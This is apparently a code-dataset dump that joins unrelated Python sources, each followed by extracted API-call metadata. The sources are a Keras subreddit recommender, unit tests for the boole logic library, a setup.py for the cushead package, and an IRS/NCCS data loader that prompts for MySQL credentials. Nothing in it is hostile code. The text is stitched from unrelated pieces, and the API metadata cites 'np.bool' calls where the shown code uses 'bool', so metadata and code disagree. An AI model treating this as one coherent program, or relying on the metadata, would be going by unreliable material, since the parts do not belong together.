        if method == 'hot':  # Input vector is multi-hot encoding.
            # FIX: dtype np.bool was removed in numpy 1.24; builtin bool is
            # the exact equivalent.
            X = np.zeros((data_length, data_width), dtype=bool)
            for i, scores in enumerate(user_subreddit_scores):
                for subreddit_key, score in scores:
                    if subreddit_key <= data_width:
                        X[i][subreddit_key - 1] = True
        else:
            raise ValueError(f"Unhandled training data preparation method {method}")

        y = np.zeros((data_length, data_width), dtype=bool)
        for i, scores in enumerate(user_subreddit_scores):
            for subreddit_key, score in scores:
                if subreddit_key <= data_width:
                    # Target is "user engaged positively with this subreddit".
                    y[i][subreddit_key - 1] = score > 0
        return X, y

    def arrange_user_data(self, user_data):
        """
        Encode one user's {subreddit_name: score} mapping as a single
        multi-hot row suitable as model input.

        :param user_data: mapping of subreddit name to interaction score.
        :return: numpy bool array of shape (1, max_subreddits_in_model).
        """
        # Keep only subreddits whose rank falls inside the model vocabulary.
        user_data = {k: v for k, v in sorted(user_data.items(), key=lambda x: x[1], reverse=True)
                     if 0 < self.subreddit_to_rank.get(k, -1) < self.config['max_subreddits_in_model']}
        if self.method == 'hot':
            # FIX: np.bool -> bool (alias removed in numpy 1.24).
            data = np.zeros((1, self.config['max_subreddits_in_model']), dtype=bool)
            for subreddit_name, subreddit_score in user_data.items():
                if subreddit_name in self.subreddit_to_rank:
                    data[0][self.subreddit_to_rank[subreddit_name] - 1] = subreddit_score > 0
        return data

    def train_model(self, train_data, test_data):
        """
        Fit the model on train_data, save the weights to self.model_path,
        then print evaluation metrics on test_data.

        :param train_data: (X, y) arrays used for fitting.
        :param test_data: (X, y) arrays used for evaluation.
        """
        X, y = train_data
        self.model.fit(X, y, epochs=5, batch_size=256, verbose=1)
        self.model.save(self.model_path)
        X, y = test_data
        scores = self.model.evaluate(X, y, verbose=1)
        print(self.model.metrics_names)
        print(scores)

    def get_user_predictions(self, user_data):
        """
        Score every candidate subreddit for a user and return ranked
        suggestions, excluding subreddits the user already has, non-SFW
        subreddits, and the first 200 ranks (the `i > 200` filter).

        :param user_data: mapping of subreddit name to interaction score.
        :return: list of (subreddit_name, score, rank_index) tuples sorted by
                 descending score.
        """
        arranged_data = self.arrange_user_data(user_data)
        user_known_subreddits = set(user_data.keys())
        with self.graph.as_default():
            with self.session.as_default():
                predictions = self.model.predict(arranged_data)[0]
        predictions = [(self.rank_to_subreddit[i+1], round(float(score), 5), i) for i, score
                       in enumerate(predictions) if self.rank_to_subreddit[i+1] not in user_known_subreddits \
                       and self.rank_to_sfw_status[i+1] and i > 200]
        predictions.sort(key=lambda x: x[1], reverse=True)
        return predictions
# Manual entry point: hop up one directory (config paths such as
# "model_generation/config.json" are relative to the project root -- TODO
# confirm) and force a retrain.
if __name__ == '__main__':
    import os
    os.chdir('..')
    modeler = SuggestionModeler(True)
| [
"os.path.exists",
"random.shuffle",
"sklearn.model_selection.train_test_split",
"tensorflow.Session",
"keras.models.Sequential",
"os.chdir",
"numpy.zeros",
"keras.layers.Dense",
"keras.layers.Dropout",
"tensorflow.get_default_graph"
] | [((5754, 5768), 'os.chdir', 'os.chdir', (['""".."""'], {}), "('..')\n", (5762, 5768), False, 'import os\n'), ((490, 502), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (500, 502), True, 'import tensorflow as tf\n'), ((524, 546), 'tensorflow.get_default_graph', 'tf.get_default_graph', ([], {}), '()\n', (544, 546), True, 'import tensorflow as tf\n'), ((677, 715), 'os.path.exists', 'os.path.exists', (['"""config_override.json"""'], {}), "('config_override.json')\n", (691, 715), False, 'import os\n'), ((3308, 3345), 'random.shuffle', 'random.shuffle', (['user_subreddit_scores'], {}), '(user_subreddit_scores)\n', (3322, 3345), False, 'import random\n'), ((3814, 3864), 'numpy.zeros', 'np.zeros', (['(data_length, data_width)'], {'dtype': 'np.bool'}), '((data_length, data_width), dtype=np.bool)\n', (3822, 3864), True, 'import numpy as np\n'), ((1656, 1668), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1666, 1668), False, 'from keras.models import Sequential\n'), ((2391, 2448), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': "self.config['test_pct']"}), "(X, y, test_size=self.config['test_pct'])\n", (2407, 2448), False, 'from sklearn.model_selection import train_test_split\n'), ((3428, 3478), 'numpy.zeros', 'np.zeros', (['(data_length, data_width)'], {'dtype': 'np.bool'}), '((data_length, data_width), dtype=np.bool)\n', (3436, 3478), True, 'import numpy as np\n'), ((4393, 4461), 'numpy.zeros', 'np.zeros', (["(1, self.config['max_subreddits_in_model'])"], {'dtype': 'np.bool'}), "((1, self.config['max_subreddits_in_model']), dtype=np.bool)\n", (4401, 4461), True, 'import numpy as np\n'), ((1691, 1780), 'keras.layers.Dense', 'Dense', (['(512)'], {'activation': '"""relu"""', 'input_shape': "(self.config['max_subreddits_in_model'],)"}), "(512, activation='relu', input_shape=(self.config[\n 'max_subreddits_in_model'],))\n", (1696, 1780), False, 'from keras.layers import Dense, Dropout, Embedding, Flatten, 
Activation, BatchNormalization\n'), ((1828, 1840), 'keras.layers.Dropout', 'Dropout', (['(0.5)'], {}), '(0.5)\n', (1835, 1840), False, 'from keras.layers import Dense, Dropout, Embedding, Flatten, Activation, BatchNormalization\n'), ((1864, 1931), 'keras.layers.Dense', 'Dense', (["self.config['max_subreddits_in_model']"], {'activation': '"""sigmoid"""'}), "(self.config['max_subreddits_in_model'], activation='sigmoid')\n", (1869, 1931), False, 'from keras.layers import Dense, Dropout, Embedding, Flatten, Activation, BatchNormalization\n'), ((2167, 2198), 'os.path.exists', 'os.path.exists', (['self.model_path'], {}), '(self.model_path)\n', (2181, 2198), False, 'import os\n')] |
##################################################
#
# Tests for model.py
#
#
#
#
#
#
#
#
#
#
#
##################################################
from boole.core.model import *
from boole.core.language import clear_default_language
from nose.tools import *
def is_prime(x):
    """
    Return True when ``x`` is a prime number.

    Used as the interpretation of the ``Prime`` predicate in the model
    tests below.

    :param x: integer to test.
    :return: True iff x is prime.
    """
    # Anything below 2 (including negatives) is not prime.  The original
    # trial-division loop accidentally returned True for negative inputs
    # because range(2, x) is empty when x < 2.
    if x < 2:
        return False
    # Trial division only needs to reach sqrt(x): any composite number has
    # a divisor no larger than its square root.
    i = 2
    while i * i <= x:
        if x % i == 0:
            return False
        i += 1
    return True
def test_val_strict():
    """
    Exercise strict evaluation (val_strict) of boole terms: terms are
    evaluated either with built-in interpretations or against the explicit
    model M constructed below.
    """
    #It is annoying that types can not be redefined: turn into a warning?
    clear_default_language()
    # Typed variables plus a small enumerated type of three people.
    x, y, z = Int('x y z')
    p, q, r, s = Bool('p q r s')
    People = EnumType('People', ['Alice', 'Bob', 'Carol'])
    Alice, Bob, Carol = People.make_constants()
    u1, u2, u3, u4, u5 = People('u1 u2 u3 u4 u5')
    # Closed arithmetic and enum terms evaluate to plain Python values.
    assert_equal(val_strict(ii(3)), 3)
    assert_equal(val_strict(rr(4.5)), 4.5)
    assert_equal(val_strict(-ii(3) + (4.5) * (2)), 6)
    assert_equal(val_strict(Alice), 'Alice')
    assert_equal(val_strict(Bob), 'Bob')
    # Quantifiers over the finite People type are decided by enumeration.
    assert(val_strict(Forall(u1, (u1 == Alice) | (u1 == Bob) | (u1 == Carol))))
    assert(not val_strict(Forall(u1, (u1 == Alice) | (u1 == Bob))))
    assert(not val_strict(true != true))
    # Only three distinct people exist, so four pairwise-distinct ones cannot.
    assert(not val_strict(Exists([u1, u2, u3, u4], And(u1 != u2, u1 != u3, u1 != u4,
                                             u2 != u3, u2 != u4, u3 != u4))))
    # Propositional connectives, lambda application, boolean quantifiers.
    assert(val_strict(true & (false >> true)))
    assert(not val_strict(true & ~(false >> true)))
    assert(val_strict(Abs([x, y], x + y)((5), (7))))
    assert(val_strict(Exists(p, p)))
    e = Exists([p, q, r], (p >> q & r) & ~(r >> p & q))
    assert(val_strict(e))
    assert(not val_strict(Forall([p,q], Exists(r, p >> r & q >> ~r))))
    # Peirce's law is classically valid.
    assert(val_strict(Forall([p,q], (((p >> q) >> p) >> p))))
    # Uninterpreted constants/function symbols to be interpreted by model M.
    # NOTE(review): the next four lines are duplicated verbatim -- apparently
    # a copy-paste artifact; behavior is unchanged by the repetition.
    a, b, c = Int('a, b, c')
    Even = Const('Even', Int >> Bool)
    Prime = Const('Prime', Int >> Bool)
    suc, square = (Int >> Int)('suc, square')
    a, b, c = Int('a, b, c')
    Even = Const('Even', Int >> Bool)
    Prime = Const('Prime', Int >> Bool)
    suc, square = (Int >> Int)('suc, square')
    # M interprets a, b, c as 5, 2, 7; Int ranges over 0..20, so integer
    # quantifiers are evaluated by finite enumeration.
    M = Model({(a, 5), (b, 2), (c, 7)})
    M[Int] = dom_range(0,20)
    M[Even] = lambda x: x % 2 == 0
    M[Prime] = is_prime
    M[suc] = lambda x: x + 1
    M[square] = lambda x: x * x
    assert_equal(val_strict(a, M), 5)
    assert_equal(val_strict(a + b * c, M), 19)
    assert(val_strict(Exists(x, b + x == c), M))
    assert(not val_strict(Even(a), M))
    assert(val_strict(Prime((23)), M))
    assert(not val_strict(Prime((22)), M))
    assert(val_strict(And(Prime(a), Prime(b), Prime(c)), M))
    assert(val_strict(Even(c) | And(Prime(a), Prime(b), Prime(c)), M))
    assert(not val_strict(Even(c) | And(Prime(suc(a)), Prime(suc(b)), Prime(c)), M))
    # Quantified facts about Even/Prime over the finite domain 0..20.
    assert(val_strict(Exists(x, Even(x)), M))
    assert(val_strict(Exists(x, And(Prime(x), Even(x))), M))
    assert(not val_strict(Exists(x, And(Prime(x), Even(x), c < x)), M))
    assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y)), M))
    assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x != y)), M))
    assert(not val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(y))), M))
    assert(val_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(x))), M))
    assert(not val_strict(Forall(x, Even(x)), M))
    assert(val_strict(Forall(x, Or(Even(x), ~Even(x))), M))
    assert(val_strict(Forall(x, Even(x) >> ~Even(suc(x))), M))
    assert(val_strict(Forall(x, Even(x) >> Even(square(x))), M))
    assert(not val_strict(Exists(x, And(Even(x), ~Even(square(x)))), M))
    assert(val_strict(Forall(x, Even(square(x)) >> Even(x)), M))
    assert(not val_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> Even(x)), M))
    assert(val_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> ~Even(y)), M))
    # Density-style statements fail on a bounded integer domain.
    assert(not val_strict(Forall(x, Exists(y, x < y)), M))
    assert(not val_strict(Forall([x, y], x < y >> Exists(z, And(x < z, z < y))), M))
    assert(val_strict(Forall([x, y], And(Even(x), Even(y), x < y) >>
                      Exists(z, (x < z) & (z < y))), M))
    # Goldbach's conjecture, checked exhaustively on the domain 0..20.
    def precond(n):
        return ((2) < n) & Even(n)
    def goldbach(n):
        return precond(n) >> Exists([x,y], Prime(x) & Prime(y) & (x + y == n))
    Goldbach = Forall(z, goldbach(z))
    assert(val_strict(Goldbach, M))
def test_val_non_strict():
    """
    Exercise non-strict evaluation (val_non_strict).  Unlike val_strict,
    an uninterpreted term evaluates to None (see the assertion on x below)
    rather than failing, and short-circuiting can decide formulas such as
    ``true | p`` without interpreting every subterm.
    """
    clear_default_language()
    # Typed variables plus a small enumerated type of three people.
    x, y, z = Int('x y z')
    p, q, r, s = Bool('p q r s')
    People = EnumType('People', ['Alice', 'Bob', 'Carol'])
    Alice, Bob, Carol = People.make_constants()
    u1, u2, u3, u4, u5 = People('u1 u2 u3 u4 u5')
    # Closed terms evaluate as usual; an uninterpreted variable gives None.
    assert_equal(val_non_strict(ii(3)), 3)
    assert_equal(val_non_strict(rr(4.5)), 4.5)
    assert_equal(val_non_strict(-(3) + (4.5) * ii(2)), 6)
    assert_equal(val_non_strict(Alice), 'Alice')
    assert_equal(val_non_strict(Bob), 'Bob')
    assert_equal(val_non_strict(x), None)
    # Quantifiers over the finite People type are decided by enumeration.
    assert(val_non_strict(Forall(u1, (u1 == Alice) | (u1 == Bob) | (u1 == Carol))))
    assert(not val_non_strict(Forall(u1, (u1 == Alice) | (u1 == Bob))))
    assert(not val_non_strict(true != true))
    # Only three distinct people exist, so four pairwise-distinct ones cannot.
    assert(not val_non_strict(Exists([u1, u2, u3, u4], And(u1 != u2, u1 != u3, u1 != u4,
                                             u2 != u3, u2 != u4, u3 != u4))))
    # Propositional connectives, lambda application, boolean quantifiers.
    assert(val_non_strict(true & (false >> true)))
    assert(not val_non_strict(true & ~(false >> true)))
    assert(val_non_strict(Abs([x, y], x + y)((5), (7))))
    assert(val_non_strict(Exists(p, p)))
    e = Exists([p, q, r], (p >> q & r) & ~(r >> p & q))
    assert(val_non_strict(e))
    assert(not val_non_strict(Forall([p,q], Exists(r, p >> r & q >> ~r))))
    assert(val_non_strict(Forall([p,q], (((p >> q) >> p) >> p))))
    # Non-strict: `p` need not be interpreted because `true |` decides it.
    assert(val_non_strict(true | p))
    # Uninterpreted constants/function symbols to be interpreted by model M.
    # NOTE(review): the next four lines are duplicated verbatim -- apparently
    # a copy-paste artifact; behavior is unchanged by the repetition.
    a, b, c = Int('a, b, c')
    Even = Const('Even', Int >> Bool)
    Prime = Const('Prime', Int >> Bool)
    suc, square = (Int >> Int)('suc, square')
    a, b, c = Int('a, b, c')
    Even = Const('Even', Int >> Bool)
    Prime = Const('Prime', Int >> Bool)
    suc, square = (Int >> Int)('suc, square')
    # M interprets a, b, c as 5, 2, 7; Int ranges over 0..20, so integer
    # quantifiers are evaluated by finite enumeration.
    M = Model({(a, 5), (b, 2), (c, 7)})
    M[Int] = dom_range(0,20)
    M[Even] = lambda x: x % 2 == 0
    M[Prime] = is_prime
    M[suc] = lambda x: x + 1
    M[square] = lambda x: x * x
    assert_equal(val_non_strict(a, M), 5)
    assert_equal(val_non_strict(a + b * c, M), 19)
    assert(val_non_strict(Exists(x, b + x == c), M))
    assert(not val_non_strict(Even(a), M))
    assert(val_non_strict(Prime((23)), M))
    assert(not val_non_strict(Prime((22)), M))
    assert(val_non_strict(And(Prime(a), Prime(b), Prime(c)), M))
    assert(val_non_strict(Even(c) | And(Prime(a), Prime(b), Prime(c)), M))
    assert(not val_non_strict(Even(c) | And(Prime(suc(a)), Prime(suc(b)), Prime(c)), M))
    # Quantified facts about Even/Prime over the finite domain 0..20.
    assert(val_non_strict(Exists(x, Even(x)), M))
    assert(val_non_strict(Exists(x, And(Prime(x), Even(x))), M))
    assert(not val_non_strict(Exists(x, And(Prime(x), Even(x), c < x)), M))
    assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y)), M))
    assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x != y)), M))
    assert(not val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(y))), M))
    assert(val_non_strict(Exists([x, y], And(Prime(x), Prime(y), x < y, Even(x))), M))
    assert(not val_non_strict(Forall(x, Even(x)), M))
    assert(val_non_strict(Forall(x, Or(Even(x), ~Even(x))), M))
    assert(val_non_strict(Forall(x, Even(x) >> ~Even(suc(x))), M))
    assert(val_non_strict(Forall(x, Even(x) >> Even(square(x))), M))
    assert(not val_non_strict(Exists(x, And(Even(x), ~Even(square(x)))), M))
    assert(val_non_strict(Forall(x, Even(square(x)) >> Even(x)), M))
    assert(not val_non_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> Even(x)), M))
    assert(val_non_strict(Forall([x, y], And(Prime(x), Prime(y), x < y) >> ~Even(y)), M))
    # Density-style statements fail on a bounded integer domain.
    assert(not val_non_strict(Forall(x, Exists(y, x < y)), M))
    assert(not val_non_strict(Forall([x, y], x < y >> Exists(z, And(x < z, z < y))), M))
    assert(val_non_strict(Forall([x, y], And(Even(x), Even(y), x < y) >>
                      Exists(z, (x < z) & (z < y))), M))
    # Goldbach's conjecture, checked exhaustively on the domain 0..20.
    def precond(n):
        return ((2) < n) & Even(n)
    def goldbach(n):
        return precond(n) >> Exists([x,y], Prime(x) & Prime(y) & (x + y == n))
    Goldbach = Forall(z, goldbach(z))
    assert(val_non_strict(Goldbach, M))
def test_lazy_models():
    """
    Check that val_strict can witness an existential quantifier over a
    lazily enumerated (potentially infinite) domain: the search stops as
    soon as a witness appears in the stream.
    """
    clear_default_language()

    def count_up():
        # Lazily enumerate the natural numbers 0, 1, 2, ...
        value = 0
        while True:
            yield value
            value += 1

    naturals = Domain('nat', count_up)
    Prime = Const('Prime', Int >> Bool)
    model = Model()
    model[Int] = naturals
    model[Prime] = is_prime
    n = Int('x')
    # Terminates once the enumeration reaches the first prime.
    assert val_strict(Exists(n, Prime(n)), model)
| [
"boole.core.language.clear_default_language"
] | [((579, 603), 'boole.core.language.clear_default_language', 'clear_default_language', ([], {}), '()\n', (601, 603), False, 'from boole.core.language import clear_default_language\n'), ((4325, 4349), 'boole.core.language.clear_default_language', 'clear_default_language', ([], {}), '()\n', (4347, 4349), False, 'from boole.core.language import clear_default_language\n'), ((8335, 8359), 'boole.core.language.clear_default_language', 'clear_default_language', ([], {}), '()\n', (8357, 8359), False, 'from boole.core.language import clear_default_language\n')] |
#!/usr/bin/env python3
"""
Host the setup function.
"""
import pathlib
import setuptools
from cushead import info
def setup() -> None:
    """
    Run the setuptools setup for the package.

    All metadata comes from the ``info`` module; data files are collected
    from the console image assets and the jinja template directories.
    """
    package_root = pathlib.Path(info.PACKAGE_NAME)
    assets_path = package_root / "console" / "assets" / "images"
    templates_path = package_root / "generator" / "templates" / "jinja" / "templates"

    # Pre-compute the derived arguments so the setup() call below stays flat.
    min_python = f">={info.PYTHON_MIN_VERSION[0]}.{info.PYTHON_MIN_VERSION[1]}"
    excluded = (str(file) for file in pathlib.Path("").iterdir() if str(file) != info.PACKAGE_NAME)
    asset_files = [str(file) for file in pathlib.Path(assets_path).iterdir()]
    template_files = [str(file) for file in pathlib.Path(templates_path).iterdir()]
    requirements = pathlib.Path("requirements.txt").read_text().split()
    readme = pathlib.Path("README.md").read_text()

    setuptools.setup(
        name=info.PACKAGE_NAME,
        version=info.PACKAGE_VERSION,
        entry_points={"console_scripts": [f"{info.PACKAGE_NAME}={info.PACKAGE_NAME}.console.console:main"]},
        url=info.SOURCE,
        project_urls={
            "Documentation": info.DOCUMENTATION,
            "Source": info.SOURCE,
        },
        python_requires=min_python,
        packages=setuptools.find_packages(exclude=excluded),
        include_package_data=True,
        data_files=[
            ("", ["requirements.txt", "LICENSE.md", "README.md"]),
            (assets_path, asset_files),
            (templates_path, template_files),
        ],
        zip_safe=False,
        install_requires=requirements,
        author=info.AUTHOR,
        author_email=info.EMAIL,
        description=info.DESCRIPTION,
        long_description=readme,
        long_description_content_type="text/markdown",
        license=info.PACKAGE_LICENSE,
        keywords=info.KEYWORDS,
        platforms="any",
        classifiers=[
            "Development Status :: 5 - Production/Stable",
            "Environment :: Console",
            "Intended Audience :: Developers",
            "License :: OSI Approved :: MIT License",
            "Operating System :: OS Independent",
            "Programming Language :: Python",
            "Programming Language :: Python :: 3",
            "Programming Language :: Python :: 3.8",
            "Programming Language :: Python :: 3.9",
            "Programming Language :: Python :: 3 :: Only",
            "Topic :: Utilities",
            "Topic :: Software Development",
            "Topic :: Software Development :: Code Generators",
            "Topic :: Software Development :: Libraries",
            "Topic :: Software Development :: Libraries :: Python Modules",
            "Topic :: Software Development :: User Interfaces",
        ],
    )
# Allow running the module directly, e.g. `python setup.py sdist`.
if __name__ == "__main__":
    setup()
| [
"pathlib.Path"
] | [((196, 227), 'pathlib.Path', 'pathlib.Path', (['info.PACKAGE_NAME'], {}), '(info.PACKAGE_NAME)\n', (208, 227), False, 'import pathlib\n'), ((283, 314), 'pathlib.Path', 'pathlib.Path', (['info.PACKAGE_NAME'], {}), '(info.PACKAGE_NAME)\n', (295, 314), False, 'import pathlib\n'), ((1480, 1505), 'pathlib.Path', 'pathlib.Path', (['"""README.md"""'], {}), "('README.md')\n", (1492, 1505), False, 'import pathlib\n'), ((1302, 1334), 'pathlib.Path', 'pathlib.Path', (['"""requirements.txt"""'], {}), "('requirements.txt')\n", (1314, 1334), False, 'import pathlib\n'), ((873, 889), 'pathlib.Path', 'pathlib.Path', (['""""""'], {}), "('')\n", (885, 889), False, 'import pathlib\n'), ((1109, 1134), 'pathlib.Path', 'pathlib.Path', (['assets_path'], {}), '(assets_path)\n', (1121, 1134), False, 'import pathlib\n'), ((1200, 1228), 'pathlib.Path', 'pathlib.Path', (['templates_path'], {}), '(templates_path)\n', (1212, 1228), False, 'import pathlib\n')] |
import os, sys
import re
import zipfile
import requests
import warnings
import logging
import pandas as pd
import numpy as np
from stat import S_IREAD, S_IRGRP, S_IROTH
import getpass
import pymysql
# Code by <NAME> (<EMAIL>), 2016-2017
class LoadData():
    """
    This class is inherited by the Data class, and contains the methods related to retrieving data remotely.
    From the web, that includes the raw 990 IRS data, the raw epostcard (990N) IRS data, and the raw BMR IRS
    data. From NCCS MySQL, it has the methods for nteedocAllEins, lu_fipsmsa, and all of the prior NCCS
    core file releases.
    """
    def get_urls(self):
        """
        Base method for loading the URLs necessary for downloads into memory.
        Main core file URL: https://www.irs.gov/uac/soi-tax-stats-annual-extract-of-tax-exempt-organization-financial-data
        ARGUMENTS
        None
        RETURNS
        None
        """
        main = self.main
        path = main.path
        entries = {'PF':{}, 'EZ':{}, 'Full':{}, 'BMF':{}, 'epostcard':{}}
        entries = self.form_urls(entries, path)
        entries = self.epost_urls(entries, path)
        entries = self.bmf_urls(entries, path)
        self.urls = entries
    def form_urls(self, entries, path):
        """
        Processes the text file in the "settings/urls" folder for EZ, Full and PF download paths.
        ARGUMENTS
        entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs
        path (str) : The base path on the local system
        RETURNS
        entries (dict) : Updated with the core file URLs as an entry.
        """
        main = self.main
        #lines look like "2015 = http://.../file.zip"; lines starting with # are comments
        urlregex = re.compile(r'(\d{4})\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*')
        skipline = re.compile(r'^#')
        for form in main.forms:
            with open(os.path.join(path, 'settings', 'urls', form.lower()+'.txt')) as f:
                for line in f:
                    regex_match = urlregex.match(line)
                    skip_match = skipline.match(line)
                    if regex_match and not skip_match:
                        year = int(regex_match.group(1))
                        url = regex_match.group(2)
                        entries[form][year] = url
            print('')
        return entries
    def epost_urls(self, entries, path):
        """
        Processes the text file in the "settings/urls" folder for the epostcard (990N) download path.
        ARGUMENTS
        entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs
        path (str) : The base path on the local system
        RETURNS
        entries (dict) : Updated with the epostcard URLs as an entry.
        """
        epostregex = re.compile(r'(epostcard)\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*')
        skipline = re.compile(r'^#')
        with open(os.path.join(path, 'settings', 'urls', 'epostcard.txt')) as f:
            for line in f:
                regex_match = epostregex.match(line)
                skip_match = skipline.match(line)
                if regex_match and not skip_match:
                    url = regex_match.group(2)
                    entries['epostcard'] = url
        return entries
    def bmf_urls(self, entries, path):
        """
        Processes the text file in the "settings/urls" folder for BMF download path.
        ARGUMENTS
        entries (dict) : A dictionary with keys=form and values=URLs or dict of URLs
        path (str) : The base path on the local system
        RETURNS
        entries (dict) : Updated with the BMF URLs as an entry.
        """
        bmfregex = re.compile(r'(region\d)\s*=\s*(https?:\/\/.+\.(dat|zip|csv|txt))\s*')
        skipline = re.compile(r'^#')
        with open(os.path.join(path, 'settings', 'urls', 'bmf.txt')) as f:
            for line in f:
                regex_match = bmfregex.match(line)
                skip_match = skipline.match(line)
                if regex_match and not skip_match:
                    url = regex_match.group(2)
                    region = regex_match.group(1)
                    entries['BMF'][region] = url
        return entries
    def download(self):
        """
        Base method for downloading the main core files from the IRS, setting the EIN as the index, and
        updating the SOURCE column with the appropriate file name.
        ARGUMENTS
        None
        RETURNS
        None
        """
        main = self.main
        delim = self.irs_delim
        current_yr = self.core_file_year #int
        main.logger.info('Beginning any necessary downloads from the IRS.')
        for form in main.forms:
            try:
                url = self.urls[form][current_yr]
            except KeyError:
                #BUGFIX: the message previously referenced an undefined name
                #"current_year", which raised a NameError instead of this message
                raise Exception('URL not found for core file year {}, form {}. Please check the "urls" folder.'.format(current_yr, form))
            df = pd.read_csv(self.download_file(url), sep=delim, dtype='str')
            #Most IRS files have EIN in caps, but at least one (2012 EZ) has it in lowercase
            if 'ein' in df.columns:
                df.rename(columns={'ein':'EIN'}, inplace=True)
            df.set_index('EIN', inplace=True)
            #adds the source file name as a column
            df['SOURCE'] = url.split('/')[-1]
            self.data_dict[form] = df
        main.logger.info('Downloading complete.\n')
    def sql_auth(self):
        """
        Handles logging into the NCCS MySQL server, including prompting for credentials.
        ARGUMENTS
        None
        RETURNS
        None
        """
        if self.get_from_sql:
            self.main.logger.info('Authenticating connection to MySQL server...')
            un = input('    MySQL user name: ')
            if sys.stdin.isatty():
                #program is being run in an interactive interpreter, and the password echo can't be shut off
                pw = input('    MySQL password: ')
            else:
                #system is running from the command line, and password echo can be off
                pw = getpass.getpass(prompt='    MySQL password: ')
            try:
                self.sql_connection = pymysql.connect(host=self.sql_server_name, db='nccs', user=un, password=pw)
            except pymysql.OperationalError:
                self.main.logger.info('    failed to connect to server; will try to load from downloads/nccs folder.\n')
                self.sql_connection = None
            else:
                self.main.logger.info('    login successful, will attempt to retrieve all necessary data from the SQL database.\n')
        else:
            self.main.logger.info('Without logging into NCCS MySQL server, will look for all files in downloads/nccs folder.\n')
            self.sql_connection = None
    def close_sql(self):
        """
        Cleanly shuts down the NCCS MySQL connection.
        ARGUMENTS
        None
        RETURNS
        None
        """
        #BUGFIX: also require an actual connection; sql_auth leaves
        #self.sql_connection as None when the login attempt fails, which
        #previously caused an AttributeError here
        if self.get_from_sql and self.sql_connection is not None:
            self.main.logger.info('Closing MySQL connection.')
            self.sql_connection.close()
    def get_sql(self, fname, dbase, cols='*', index_col='EIN', match_dtypes=None, force_sql_cols=False):
        """
        Method for downloading a file, passed as the "fname" argument, from the MySQL connection established
        in the sql_auth method.
        It will first check its own cache to see if it has already downloaded the file and is holding it in
        memory, then it will look in the "downloads/nccs" folder to see if that exact fname has already been
        downloaded.  Only if both of those are false will it connect to MySQL to retrieve the file.
        For users off the Urban campus or without a login to the NCCS MySQL server, having all the necessary
        files as .csv documents in the "downloads/nccs" folder means the program can still build.  See
        "folder instructions.txt" in that folder for more details.
        ARGUMENTS
        cols (str or list): Default '*', used when only a subset of the data should be returned.
        index_col (str): Default 'EIN', specifies the column to use as the index.
        match_dtypes (DataFrame): Default None, if a dataframe is passed it will extract the schema from
                                  it and apply it to the data specified in fname; otherwise it uses the
                                  MySQL defaults.
        force_sql_cols (bool): Default False, If True it will force the columns specified in the cols argument
                               to become a part of the SQL statement; otherwise it downloads * in the SELECT
                               statement and then subsets it later.  This is used, for example, in
                               nteedocAllEINS because the full file is 1.5 gigabytes but only 1/3rd of that is
                               needed.
        RETURNS
        DataFrame
        """
        file_path = os.path.join(self.main.path, self.nccs_download_folder)
        existing_downloads = os.listdir(file_path)
        existing_downloads = [f for f in existing_downloads if f.endswith('.csv')]
        if fname in self.sql_cache:
            self.main.logger.info('File already cached; trying version in memory.')
            if isinstance(cols, list):
                try:
                    return self.sql_cache[fname][cols]
                except KeyError:
                    self.main.logger.info('    Specified columns not in memory.')
                    pass #if the dataframe is cached already but the desired cols are missing, continue with sql loading
            else:
                return self.sql_cache[fname]
        if fname+'.csv' in existing_downloads:
            self.main.logger.info('File found in NCCS downloads; using already-downloaded version.')
            if match_dtypes is not None:
                dtype = match_dtypes.dtypes.to_dict()
                dtype['EIN'] = 'str'
            else:
                dtype = 'str'
            df = pd.read_csv(os.path.join(file_path, fname+'.csv'), dtype=dtype, low_memory=False, encoding='utf-8')
            if index_col is not None: df.set_index(index_col, inplace=True)
            if match_dtypes is None:
                num_cols = [c for c in self.numeric_columns if c in df]
                for col in num_cols:
                    df[col] = pd.to_numeric(df[col], errors='coerce').fillna(0) #recast the str columns to float64 or int64
                str_cols = df.select_dtypes(include=[np.object_]).columns.values #fill string NA columns with empty strings
                df.loc[:, str_cols] = df.loc[:, str_cols].fillna('')
        elif self.sql_connection is not None:
            con = self.sql_connection
            con.select_db(dbase)
            if force_sql_cols:
                sql_cols = ', '.join(cols)
            else:
                sql_cols = '*'
            df = pd.read_sql('SELECT {} FROM {}'.format(sql_cols, fname), con=con, index_col=index_col)
            df.columns = [c.upper() for c in df.columns.values]
            if match_dtypes is not None:
                self.main.logger.info('    standardizing dtypes for {}...'.format(fname))
                def _dtype_matcher(c):
                    if c.name in match_dtypes.columns:
                        desired_type = match_dtypes[c.name].dtype.type
                        if desired_type is np.object_:
                            return c.astype(str)
                        elif desired_type in [np.float64, np.int64, np.float32, np.int32]:
                            return pd.to_numeric(c, errors='coerce').fillna(0)
                        else:
                            return c.astype(str) #assume strings for anything else (e.g. dates)
                            #raise Exception('Unknown dtype: {}, {}'.format(c.name, desired_type))
                    else:
                        return c.astype(str)
                df = df.apply(_dtype_matcher) #this is not very efficient, but I haven't found a better way to make sure all dtypes match from SQL
            df.to_csv(os.path.join(file_path, fname+'.csv'), index=df.index.name is not None)
        else:
            raise Exception('No active connection to NCCS MySQL database, and file not found in downloads/nccs folder: {}'.format(fname))
        self.sql_cache[fname] = df #save all dataframes loaded from sql in case they are needed later, because sql load times are slow
        if cols == '*':
            return df
        else:
            return df.loc[:, [c.upper() for c in cols if c.upper() != 'EIN']]
    def download_epostcard(self, usecols=[0, 1], names=['EIN', 'EPOSTCARD'], date_col='EPOSTCARD'):
        """
        Method for downloading the epostcard (990N) data from the IRS.
        ARGUMENTS
        usecols (list) : Default [0, 1], this data comes without headers, so the subset needed is given as
                         indexes.
